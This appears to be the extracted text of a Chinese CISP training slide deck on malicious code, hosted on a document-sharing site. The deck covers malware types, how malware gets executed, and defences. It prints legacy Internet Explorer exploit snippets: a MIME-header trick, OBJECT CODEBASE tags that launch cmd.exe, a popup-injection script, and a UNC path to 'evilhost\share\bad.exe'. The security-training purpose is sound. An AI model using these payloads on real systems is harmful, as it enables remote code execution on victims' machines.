恶意代码原理介绍.pptVIP

  1. 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  4. 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  5. 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  6. 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  7. 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
恶意代码原理介绍

信息安全技术 恶意代码 中国信息安全产品测评认证中心(CNITSEC) CISP-2-恶意代码(培训样稿) Overview 什么是恶意代码 恶意代码如何会在你的系统上运行 防御恶意代码 什么是恶意代码 二进制文件 病毒、木马、逻辑炸弹 脚本 各种脚本语言嵌入文档的脚本 宏 什么是宏 Bimary File Format 恶意代码如何会被运行 伪装成有用的文件 嵌入其他文件 利用系统漏洞 欺骗 Overview 什么是恶意代码 方向 服务器?客户端、p2p 客户端?服务器 恶意代码如何会在你的系统上运行 防御恶意代码 伪装成有用的文件 Bind Exploit Php OF Exploit 邮件欺骗 Wantjob变种 “中国黑客” “You win ……free porn……” 嵌入其他文件 二进制可执行文件嵌入 病毒式的感染 insertcode.exe EXEbind 脚本嵌入 Word系列文件、lotus系列文件 HTML!!! 利用系统漏洞 lotus Notes 邮件对象嵌入(略) Word 2000带有模板文件链接的RTF文件(略) 利用flash本身的漏洞 =6.0.29 畸形文件头缓冲区溢出 6.0.29 movie参数缓冲区溢出 IE的多个问题 OE、outlook、foxmail…… IE的多个问题 IE 5.5 以下异常处理MIME头 IE 5.5 以下com.ms.activeX.ActiveXComponent对象嵌入 IE 5.5 以下codebase指向 IE 6.0 window.PoPup()window.Open() 如何利用来运行指定的程序 IE 5.5 以下异常处理MIME头 nimda、wantjob、中国黑客、爱情森林 Content-Type: audio/x-wav; name=hello.bat Content-Transfer-Encoding: quoted-printable Content-ID: THE-CID cmd.exe com.ms.activeX.ActiveXComponent对象嵌入 APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent/APPLET SCRIPT ………… SCRIPT IE 5.5 以下codebase指向 CLSID不为0 CODEBASE指向绝对路径 OBJECT CLASSID = CLSID0-0-0-0 CODEBASE = \Winnt\system32\cmd.exe/OBJECT IE 6.0 window.PoPup()window.Open() IE 5.5 CODEBASE问题的延续 使用window.PoPup()或window.Open()调用创建一个新对象 var oPopup = window.createPopup(); function openPopupCMD() { var oPopBody = oPopup.document.body; oPopBody.innerHTML = OBJECT NAME=X CLASSID=CLSID0-0-0-0 CODEBASE=/winnt/system32/cmd.exe/OBJECT; oPopup.show( document.body); } setTimeout(openPopupCMD(),10); 如何利用来运行指定的程序 Codebase问题 预先上传的程序 UNC路径 CODEBASE = ‘\\evilhost\share\bad.exe’ com.ms.activeX.ActiveXComponent对象嵌入 预先上传的程序 UNC路径 D 利用HTML运行任意程序 预备知识 几个debug命令 几个对象 几个D命令 a 汇编命令,将汇编语句直接装配到存储器中 r 寄存器命令,显示和设置寄存器AX、BX、CX、DX等 n 命名命令 w 写命令,将指定数据写到磁盘上 q 退出 几个对象 WshNetwork 对象 提供对 Microsoft Windows 网络的访问,包括使用远程驱动器和打印机 WshShell 对象 启动进程,读写注册表…… 几个对象 FileSystemObject 对象 进行所有可能的文件操作,包括NTFS提供的一些特性。 Shell.Application 对象 浏览目录,运行程序。 利用HTML运行任意程序 调用ActiveX对象可以进行很多功能强大的操作,如运行程序等。但在执行较危险的调用时都会有警告信息。如将下面这行代码加到一个HTML文件中,

文档评论(0)

153****9595 + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档